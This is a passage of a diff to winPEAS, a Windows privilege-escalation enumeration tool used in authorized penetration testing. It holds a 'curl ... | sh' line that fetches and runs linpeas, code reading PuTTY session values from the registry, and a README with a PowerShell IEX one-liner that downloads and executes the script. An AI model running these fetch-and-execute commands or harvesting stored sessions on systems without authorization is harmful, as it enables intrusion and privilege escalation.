// catch (DirectoryNotFoundException)
|
||||
// {
|
||||
// return new List<FileInfo>();
|
||||
// }
|
||||
// catch (Exception)
|
||||
// {
|
||||
// return new List<FileInfo>();
|
||||
// }
|
||||
|
||||
// List<FileInfo> result = new List<FileInfo>();
|
||||
|
||||
// foreach (var d in directories)
|
||||
// {
|
||||
// result.AddRange(GetFiles(d.FullName, pattern));
|
||||
// }
|
||||
|
||||
// try
|
||||
// {
|
||||
// result.AddRange(dirInfo.GetFiles(pattern));
|
||||
// }
|
||||
// catch (UnauthorizedAccessException)
|
||||
// {
|
||||
// }
|
||||
// catch (PathTooLongException)
|
||||
// {
|
||||
// }
|
||||
// catch (DirectoryNotFoundException)
|
||||
// {
|
||||
// }
|
||||
// catch (Exception)
|
||||
// {
|
||||
// }
|
||||
|
||||
// return result;
|
||||
//}
|
||||
|
||||
|
||||
public static List<CustomFileInfo> GetFilesFast(string folder, string pattern = "*", HashSet<string> excludedDirs = null, bool isFoldersIncluded = false)
|
||||
{
|
||||
ConcurrentBag<CustomFileInfo> files = new ConcurrentBag<CustomFileInfo>();
|
||||
IEnumerable<DirectoryInfo> startDirs = GetStartDirectories(folder, files, pattern, isFoldersIncluded);
|
||||
IList<DirectoryInfo> startDirsExcluded = new List<DirectoryInfo>();
|
||||
IList<string> known_dirs = new List<string>();
|
||||
ConcurrentDictionary<string, byte> known_dirs = new ConcurrentDictionary<string, byte>();
|
||||
|
||||
if (excludedDirs != null)
|
||||
{
|
||||
@@ -68,37 +189,27 @@ namespace winPEAS.Helpers.Search
|
||||
|
||||
Parallel.ForEach(startDirsExcluded, (d) =>
|
||||
{
|
||||
Parallel.ForEach(GetStartDirectories(d.FullName, files, pattern, isFoldersIncluded), (dir) =>
|
||||
var foundFiles = GetFiles(d.FullName, pattern);
|
||||
foreach (var f in foundFiles)
|
||||
{
|
||||
GetFiles(dir.FullName, pattern).ForEach(
|
||||
(f) =>
|
||||
{
|
||||
if (!StaticExtensions.Contains(f.Extension.ToLower()))
|
||||
{
|
||||
// It should always be lesss than 260, but some times it isn't so this will bypass that file
|
||||
if (Checks.Checks.IsLongPath || f.FullName.Length <= 260)
|
||||
if (f != null && !StaticExtensions.Contains(f.Extension.ToLower()))
|
||||
{
|
||||
CustomFileInfo file_info = new CustomFileInfo(f.Name, f.Extension, f.FullName, f.Length, false);
|
||||
files.Add(file_info);
|
||||
|
||||
CustomFileInfo file_dir = new CustomFileInfo(f.Directory.Name, "", f.Directory.FullName, 0, true);
|
||||
if (!known_dirs.Contains(file_dir.FullPath))
|
||||
if (known_dirs.TryAdd(file_dir.FullPath, 0))
|
||||
{
|
||||
known_dirs.Add(file_dir.FullPath);
|
||||
files.Add(file_dir);
|
||||
}
|
||||
}
|
||||
else if (f.FullName.Length > 260)
|
||||
Beaprint.LongPathWarning(f.FullName);
|
||||
}
|
||||
}
|
||||
);
|
||||
});
|
||||
});
|
||||
|
||||
return files.ToList();
|
||||
}
|
||||
|
||||
|
||||
private static List<FileInfo> GetFiles(string folder, string pattern = "*")
|
||||
{
|
||||
DirectoryInfo dirInfo;
|
||||
@@ -130,16 +241,22 @@ namespace winPEAS.Helpers.Search
|
||||
return new List<FileInfo>();
|
||||
}
|
||||
|
||||
List<FileInfo> result = new List<FileInfo>();
|
||||
ConcurrentBag<FileInfo> result = new ConcurrentBag<FileInfo>();
|
||||
|
||||
foreach (var d in directories)
|
||||
Parallel.ForEach(directories, (d) =>
|
||||
{
|
||||
result.AddRange(GetFiles(d.FullName, pattern));
|
||||
foreach (var file in GetFiles(d.FullName, pattern))
|
||||
{
|
||||
result.Add(file);
|
||||
}
|
||||
});
|
||||
|
||||
try
|
||||
{
|
||||
result.AddRange(dirInfo.GetFiles(pattern));
|
||||
foreach (var file in dirInfo.GetFiles(pattern))
|
||||
{
|
||||
result.Add(file);
|
||||
}
|
||||
}
|
||||
catch (UnauthorizedAccessException)
|
||||
{
|
||||
@@ -154,7 +271,7 @@ namespace winPEAS.Helpers.Search
|
||||
{
|
||||
}
|
||||
|
||||
return result;
|
||||
return result.ToList();
|
||||
}
|
||||
|
||||
private static IEnumerable<DirectoryInfo> GetStartDirectories(string folder, ConcurrentBag<CustomFileInfo> files, string pattern, bool isFoldersIncluded = false)
|
||||
|
||||
@@ -8,7 +8,7 @@ namespace winPEAS.Info.FilesInfo.WSL
|
||||
{
|
||||
public static void RunLinpeas(string linpeasUrl)
|
||||
{
|
||||
string linpeasCmd = $"curl {linpeasUrl} --silent | sh";
|
||||
string linpeasCmd = $"curl -L {linpeasUrl} --silent | sh";
|
||||
string command = Environment.Is64BitProcess ?
|
||||
$@"bash -c ""{linpeasCmd}""" :
|
||||
Environment.GetEnvironmentVariable("WinDir") + $"\\SysNative\\bash.exe -c \"{linpeasCmd}\"";
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
using System;
|
||||
using System.Diagnostics;
|
||||
using System.Collections.Generic;
|
||||
using System.Globalization;
|
||||
using System.IO;
|
||||
@@ -7,9 +8,11 @@ using System.Management;
|
||||
using System.Net;
|
||||
using System.Net.NetworkInformation;
|
||||
using System.Windows.Forms;
|
||||
using System.Text.RegularExpressions;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
|
||||
|
||||
namespace winPEAS.Info.SystemInfo
|
||||
{
|
||||
class SystemInfo
|
||||
@@ -49,6 +52,60 @@ namespace winPEAS.Info.SystemInfo
|
||||
public static Dictionary<string, string> GetBasicOSInfo()
|
||||
{
|
||||
Dictionary<string, string> results = new Dictionary<string, string>();
|
||||
|
||||
// Systeminfo from cmd to be able to use wes-ng
|
||||
///////////////////////////////////////////////
|
||||
|
||||
Process process = new Process();
|
||||
|
||||
// Configure the process to run the systeminfo command
|
||||
process.StartInfo.FileName = "systeminfo.exe";
|
||||
process.StartInfo.UseShellExecute = false;
|
||||
process.StartInfo.RedirectStandardOutput = true;
|
||||
|
||||
// Start the process
|
||||
process.Start();
|
||||
|
||||
// Read the output of the command
|
||||
string output = process.StandardOutput.ReadToEnd();
|
||||
|
||||
// Wait for the command to finish
|
||||
process.WaitForExit();
|
||||
|
||||
|
||||
// Split the output by newline characters
|
||||
string[] lines = output.Split(new[] { '\n' }, StringSplitOptions.RemoveEmptyEntries);
|
||||
|
||||
string osname = @".*?Microsoft[\(R\)]{0,3} Windows[\(R\)?]{0,3} ?(Serverr? )?(\d+\.?\d?( R2)?|XP|VistaT).*";
|
||||
string osversion = @".*?((\d+\.?){3}) ((Service Pack (\d)|N\/\w|.+) )?[ -\xa5]+ (\d+).*";
|
||||
// Iterate over each line and add key-value pairs to the dictionary
|
||||
foreach (string line in lines)
|
||||
{
|
||||
int index = line.IndexOf(':');
|
||||
if (index != -1)
|
||||
{
|
||||
string key = line.Substring(0, index).Trim();
|
||||
string value = line.Substring(index + 1).Trim();
|
||||
if (Regex.IsMatch(value, osname, RegexOptions.IgnoreCase))
|
||||
{
|
||||
results["OS Name"] = value;
|
||||
}
|
||||
//I have to find a better way. Maybe use regex from wes-ng
|
||||
if (Regex.IsMatch(value, osversion, RegexOptions.IgnoreCase))
|
||||
{
|
||||
results["OS Version"] = value;
|
||||
}
|
||||
|
||||
if (value.Contains("based PC"))
|
||||
{
|
||||
results["System Type"] = value;
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
// ENDING Systeminfo from cmd to be able to use wes-ng
|
||||
///////////////////////////////////////////////
|
||||
try
|
||||
{
|
||||
string ProductName = RegistryHelper.GetRegValue("HKLM", "Software\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
|
||||
|
||||
@@ -129,6 +129,24 @@ namespace winPEAS.KnownFileCreds
|
||||
else
|
||||
{
|
||||
string[] subKeys = RegistryHelper.GetRegSubkeys("HKCU", "Software\\SimonTatham\\PuTTY\\Sessions\\");
|
||||
RegistryKey selfKey = Registry.CurrentUser.OpenSubKey(@"Software\\SimonTatham\\PuTTY\\Sessions"); // extract own Sessions registry keys
|
||||
|
||||
if (selfKey != null)
|
||||
{
|
||||
string[] subKeyNames = selfKey.GetValueNames();
|
||||
foreach (string name in subKeyNames)
|
||||
{
|
||||
Dictionary<string, string> putty_sess_key = new Dictionary<string, string>()
|
||||
{
|
||||
{ "RegKey Name", name },
|
||||
{ "RegKey Value", (string)selfKey.GetValue(name) },
|
||||
};
|
||||
|
||||
results.Add(putty_sess_key);
|
||||
}
|
||||
selfKey.Close();
|
||||
}
|
||||
|
||||
foreach (string sessionName in subKeys)
|
||||
{
|
||||
Dictionary<string, string> putty_sess = new Dictionary<string, string>()
|
||||
|
||||
4
winPEAS/winPEASexe/winPEAS/packages.config
Normal file
4
winPEAS/winPEASexe/winPEAS/packages.config
Normal file
@@ -0,0 +1,4 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<packages>
|
||||
<package id="AlphaFS" version="2.2.6" targetFramework="net452" />
|
||||
</packages>
|
||||
@@ -114,12 +114,16 @@
|
||||
</StartupObject>
|
||||
</PropertyGroup>
|
||||
<ItemGroup>
|
||||
<Reference Include="AlphaFS, Version=2.2.0.0, Culture=neutral, PublicKeyToken=4d31a58f7d7ad5c9, processorArchitecture=MSIL">
|
||||
<HintPath>..\packages\AlphaFS.2.2.6\lib\net452\AlphaFS.dll</HintPath>
|
||||
</Reference>
|
||||
<Reference Include="System" />
|
||||
<Reference Include="System.Core" />
|
||||
<Reference Include="System.DirectoryServices.AccountManagement" />
|
||||
<Reference Include="System.Management" />
|
||||
<Reference Include="System.Security" />
|
||||
<Reference Include="System.ServiceProcess" />
|
||||
<Reference Include="System.Transactions" />
|
||||
<Reference Include="System.Web.Extensions" />
|
||||
<Reference Include="System.Windows.Forms" />
|
||||
<Reference Include="System.Xml.Linq" />
|
||||
@@ -696,6 +700,7 @@
|
||||
<Link>sensitive_files.yaml</Link>
|
||||
</EmbeddedResource>
|
||||
<None Include="App.config" />
|
||||
<None Include="packages.config" />
|
||||
<None Include="TaskScheduler\V1\TaskSchedulerV1Schema.xsd">
|
||||
<SubType>Designer</SubType>
|
||||
</None>
|
||||
|
||||
26
winPEAS/winPEASps1/README.md
Executable file
26
winPEAS/winPEASps1/README.md
Executable file
@@ -0,0 +1,26 @@
|
||||
# Windows Privilege Escalation Awesome Script (.ps1)
|
||||
|
||||

|
||||
|
||||
**WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation)**
|
||||
|
||||
Check also the **Local Windows Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation)**
|
||||
|
||||
## Mantainer
|
||||
|
||||
The official **maintainer of this script is [RandolphConley](https://github.com/RandolphConley)**.
|
||||
|
||||
## Quick Start
|
||||
|
||||
Download the **[latest releas from here](https://github.com/carlospolop/PEASS-ng/releases/latest)**.
|
||||
|
||||
```bash
|
||||
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/WinPeas.ps1')"
|
||||
```
|
||||
|
||||
## Advisory
|
||||
|
||||
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
|
||||
|
||||
|
||||
By Polop
|
||||
1223
winPEAS/winPEASps1/winPEAS.ps1
Normal file
1223
winPEAS/winPEASps1/winPEAS.ps1
Normal file
File diff suppressed because it is too large
Load Diff
Reference in New Issue
Block a user